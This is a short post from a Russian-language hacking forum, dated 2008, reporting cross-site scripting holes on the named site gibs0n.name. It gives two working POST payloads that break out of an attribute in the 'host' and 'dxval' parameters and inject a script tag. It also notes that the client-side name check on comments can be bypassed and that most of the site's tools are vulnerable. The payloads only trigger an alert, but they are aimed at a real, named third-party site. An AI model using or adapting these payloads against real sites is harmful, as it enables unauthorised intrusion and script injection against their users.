Тема: gibs0n.name
Показать сообщение отдельно

  #3  
Старый 21.02.2008, 20:08
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

XSS
Код:
POST / host='"/><script>alert(/1/)</script>
Код:
POST /tools/dxval='"/><script>alert(/1/)</script>
При добавлении коментария можно обойти js на инкорект нейм что является уязвимым...

Короче почти во всех тулзах XSS

Последний раз редактировалось Isis; 21.02.2008 в 20:15..
 
Ответить с цитированием